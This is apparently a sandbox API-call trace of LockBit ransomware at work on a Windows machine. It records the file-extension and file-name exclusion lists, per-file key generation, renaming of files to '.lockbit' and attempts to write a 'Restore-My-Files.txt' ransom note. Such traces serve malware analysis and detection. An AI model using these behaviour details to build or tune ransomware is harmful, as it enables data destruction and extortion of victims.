PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.212] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.212] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.212] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01183_.WMF", cAlternateFileName="")) returned 1 [0113.212] lstrcmpiW (lpString1=".", lpString2="DD01183_.WMF") returned -1 [0113.212] lstrcmpiW (lpString1="..", lpString2="DD01183_.WMF") returned -1 [0113.212] PathFindExtensionW (pszPath="DD01183_.WMF") returned=".WMF" [0113.212] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.212] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.212] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.212] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.213] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.214] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.214] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.215] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01183_.WMF") returned 1 [0113.215] lstrcmpiW (lpString1="ntldr", lpString2="DD01183_.WMF") returned 1 [0113.215] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01183_.WMF") returned 1 [0113.215] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01183_.WMF") returned -1 [0113.215] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01183_.WMF") returned -1 [0113.215] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01183_.WMF") returned 1 [0113.215] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01183_.WMF") returned 1 [0113.215] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.215] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned=".WMF" [0113.215] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.215] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.215] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.215] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.215] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.215] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.215] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.215] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.215] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.215] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.215] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.215] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.216] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.216] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.lockbit") returned 72 [0113.216] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.217] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.217] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.217] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2296) returned 1 [0113.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.218] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.218] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.218] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.223] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.223] malloc (_Size=0xa6) returned 0x77d7a8 [0113.223] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.224] free (_Block=0x77d7a8) [0113.224] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.224] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.224] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.224] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9936cb00, ftCreationTime.dwHighDateTime=0x1bd4c0e, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9936cb00, ftLastWriteTime.dwHighDateTime=0x1bd4c0e, nFileSizeHigh=0x0, nFileSizeLow=0x2174, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01186_.WMF", cAlternateFileName="")) returned 1 [0113.224] lstrcmpiW (lpString1=".", lpString2="DD01186_.WMF") returned -1 [0113.224] lstrcmpiW (lpString1="..", lpString2="DD01186_.WMF") returned -1 [0113.224] PathFindExtensionW (pszPath="DD01186_.WMF") returned=".WMF" [0113.224] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.224] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.224] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.224] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.224] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.224] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.224] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.225] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.226] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.226] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01186_.WMF") returned 1 [0113.227] lstrcmpiW (lpString1="ntldr", lpString2="DD01186_.WMF") returned 1 [0113.227] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01186_.WMF") returned 1 [0113.227] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01186_.WMF") returned -1 [0113.227] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01186_.WMF") returned -1 [0113.227] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01186_.WMF") returned 1 [0113.227] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01186_.WMF") returned 1 [0113.227] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.227] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned=".WMF" [0113.227] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.227] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.227] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.227] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.227] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.227] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.227] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.227] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.227] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.227] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.227] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.228] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.228] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.lockbit") returned 72 [0113.228] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0113.229] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.229] malloc (_Size=0x40068) returned 0x3ef0008 [0113.229] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=8564) returned 1 [0113.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0113.230] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0113.230] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0113.239] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.239] malloc (_Size=0xa6) returned 0x77d7a8 [0113.239] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.240] free (_Block=0x77d7a8) [0113.240] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.240] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.240] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.240] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4fe9900, ftCreationTime.dwHighDateTime=0x1c7a766, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4fe9900, ftLastWriteTime.dwHighDateTime=0x1c7a766, nFileSizeHigh=0x0, nFileSizeLow=0x6e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01366_.WMF", cAlternateFileName="")) returned 1 [0113.240] lstrcmpiW (lpString1=".", lpString2="DD01366_.WMF") returned -1 [0113.240] lstrcmpiW (lpString1="..", lpString2="DD01366_.WMF") returned -1 [0113.240] PathFindExtensionW (pszPath="DD01366_.WMF") returned=".WMF" [0113.240] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.240] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.240] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.240] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.240] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.240] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.241] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.242] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.242] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01366_.WMF") returned 1 [0113.242] lstrcmpiW (lpString1="ntldr", lpString2="DD01366_.WMF") returned 1 [0113.242] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01366_.WMF") returned 1 [0113.242] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01366_.WMF") returned -1 [0113.243] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01366_.WMF") returned -1 [0113.243] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01366_.WMF") returned 1 [0113.243] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01366_.WMF") returned 1 [0113.243] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.243] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned=".WMF" [0113.243] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.243] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 